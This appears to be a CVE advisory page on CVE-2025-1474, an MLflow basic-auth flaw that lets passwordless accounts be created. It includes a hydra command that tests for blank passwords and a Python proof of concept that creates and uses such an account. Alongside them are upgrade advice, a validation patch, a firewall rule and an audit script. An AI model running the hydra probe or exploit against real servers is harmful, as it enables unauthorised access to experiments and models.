MLflow, Missing Password Enforcement in User Creation, CVE-2025-1474 (Critical)

How CVE-2025-1474 Works

In MLflow versions before 2.19.0, the basic-auth plugin's user creation API (`POST /api/2.0/mlflow/users/create`, also reached through the `/signup` page) accepts an empty password, so an administrator can create an account that has no real credential at all. The flaw is a missing backend check: the handler only verifies that the `password` parameter is present, not that it is non-empty, and the empty value is hashed and stored like any other password. Anyone who knows or guesses such a username can then authenticate with a blank password (no brute force of the password itself is needed) and act with that account's permissions, which by default include read access to experiments, runs and registered models, and write access to anything the account owns or was granted. The CVSS 4.0 rating cited for this issue reflects network reachability and low attack complexity with high confidentiality and integrity impact; the practical precondition is that an admin has created at least one account without a password.

DailyCVE Form:

Platform: MLflow
Version: <2.19.0
Vulnerability: Missing Password Enforcement
Severity: Critical
Date: 03/27/2025

What Undercode Say:

Exploitation:

1. Test for Empty Credentials (the basic-auth plugin uses HTTP Basic authentication on every API path rather than a login form, so point hydra at a protected endpoint and use `-e n` to try a null password for each candidate username):

hydra -L users.txt -e n -t 4 -s 5000 <mlflow-server> http-get "/api/2.0/mlflow/experiments/get?experiment_id=0"

2. API Exploit (Python; per the CVE the creating account must itself be an admin, so the request carries the administrator's Basic-auth credentials, shown as placeholders):

import requests

BASE = "http://mlflow-server:5000"
target = f"{BASE}/api/2.0/mlflow/users/create"
admin_auth = ("admin", "<admin-password>")  # placeholder admin credentials
headers = {"Content-Type": "application/json"}
# An empty string is what a blank form field submits; a pre-2.19.0 server
# accepts it and stores an account whose password is effectively empty.
data = {"username": "exploit_user", "password": ""}
response = requests.post(target, json=data, headers=headers, auth=admin_auth)
print(response.status_code, response.text)

# Confirm the new account authenticates with a blank password.
probe = requests.get(f"{BASE}/api/2.0/mlflow/experiments/get",
                     params={"experiment_id": "0"}, auth=("exploit_user", ""))
print(probe.status_code)  # 200 on a vulnerable server, 401 once fixed

Protection:

1. Upgrade (quote the specifier, otherwise the shell treats `>` as a redirect):

pip install "mlflow>=2.19.0"

2. Manual Patch: If you cannot upgrade yet, reject empty passwords in the basic-auth plugin's `create_user` handler (`mlflow/server/auth/__init__.py`; `mlflow/server/handlers.py` does not contain user management) before the hash is stored:

def validate_password(password):
    # Reject None, "" and short values before hashing; the 8-character
    # minimum is a local policy choice, not MLflow's own rule.
    if not password or len(password) < 8:
        raise ValueError("Password required")

3. Network Controls (the negation goes before `-s`; `-s !addr` is the deprecated form):

iptables -A INPUT -p tcp --dport 5000 ! -s <trusted_ip> -j DROP

Analytics:

  • Attack Surface: Exposed `POST /api/2.0/mlflow/users/create` endpoints and the `/signup` page that posts to them.
  • Detection: Passwords are never logged (only hashes are stored), so look for `POST /api/2.0/mlflow/users/create` in access logs and test each account in the auth database against a blank password.
  • Mitigation: Upgrading to 2.19.0 or later closes the creation path, but accounts already created without a password stay valid until their passwords are reset or they are deleted.
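To find accounts that were already created this way, as an added example that is not part of the original advisory or of MLflow's own code: the script below reads the basic-auth plugin's SQLite store and reports every user whose stored Werkzeug hash verifies against the empty string. It assumes the plugin's default `sqlite:///basic_auth.db` store with a `users` table holding `username`, `password_hash` and `is_admin` columns (assumed from the plugin's store schema), verifies Werkzeug's `pbkdf2:...` and `scrypt:...` hash formats with the standard library only, and builds a constructed in-memory sample database so it runs offline.

```python
import hashlib
import hmac
import sqlite3
from typing import List, Tuple

# Werkzeug password-hash layouts (MLflow's basic-auth store hashes with Werkzeug):
#   pbkdf2:<hash_name>:<iterations>$<salt>$<hexdigest>
#   scrypt:<n>:<r>:<p>$<salt>$<hexdigest>
# Schema assumption: a `users` table with username, password_hash, is_admin.


def verify_werkzeug_hash(stored: str, candidate: str) -> bool:
    """Return True if `candidate` matches a Werkzeug-format password hash."""
    try:
        method, salt, digest = stored.split("$", 2)
    except ValueError:
        return False
    parts = method.split(":")
    if parts[0] == "pbkdf2" and len(parts) == 3:
        derived = hashlib.pbkdf2_hmac(
            parts[1], candidate.encode(), salt.encode(), int(parts[2])
        ).hex()
    elif parts[0] == "scrypt" and len(parts) == 4:
        n, r, p = (int(x) for x in parts[1:])
        derived = hashlib.scrypt(
            candidate.encode(), salt=salt.encode(), n=n, r=r, p=p, maxmem=132 * n * r * p
        ).hex()
    else:
        return False  # unknown method: do not guess
    return hmac.compare_digest(derived, digest)


def make_pbkdf2_hash(password: str, salt: str = "constructedsalt", iterations: int = 1000) -> str:
    """Produce a Werkzeug-compatible pbkdf2 hash (low iteration count for the sample)."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations).hex()
    return f"pbkdf2:sha256:{iterations}${salt}${digest}"


def find_passwordless_users(conn: sqlite3.Connection) -> List[Tuple[str, bool]]:
    """Return (username, is_admin) for every account whose hash matches ""."""
    rows = conn.execute(
        "SELECT username, password_hash, is_admin FROM users ORDER BY id"
    ).fetchall()
    return [(user, bool(admin)) for user, pw_hash, admin in rows if verify_werkzeug_hash(pw_hash, "")]


def audit_database(db_path: str) -> List[Tuple[str, bool]]:
    """Audit a real basic-auth SQLite file (default file name: basic_auth.db), read-only."""
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)
    try:
        return find_passwordless_users(conn)
    finally:
        conn.close()


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for basic_auth.db with one passwordless account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, "
        "password_hash TEXT NOT NULL, is_admin INTEGER NOT NULL DEFAULT 0)"
    )
    sample = [
        ("admin", "correct horse battery staple", 1),
        ("svc-train", "", 0),  # created through the unvalidated endpoint
        ("alice", "s3cret-passw0rd", 0),
    ]
    conn.executemany(
        "INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
        [(u, make_pbkdf2_hash(p), a) for u, p, a in sample],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    for user, is_admin in find_passwordless_users(build_sample_db()):
        print(f"passwordless account: {user} (admin={is_admin})")
```

Run `audit_database("basic_auth.db")` against a copy of the server's store (or with the server stopped); every account it reports should have its password reset through `PATCH /api/2.0/mlflow/users/update-password` or be deleted, since upgrading alone does not touch existing rows.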


References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1474